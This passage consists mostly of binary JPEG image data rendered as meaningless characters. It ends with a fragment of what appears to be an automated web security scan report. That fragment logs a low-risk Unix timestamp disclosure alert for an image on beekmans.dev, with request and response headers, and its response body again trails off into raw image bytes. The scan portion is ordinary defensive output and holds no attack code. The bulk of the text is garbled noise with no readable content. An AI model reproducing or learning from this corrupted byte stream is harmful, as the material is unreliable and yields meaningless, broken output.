¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          73579908
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        47. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          98849039, which evaluates to: 1973-02-18 03:03:59

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
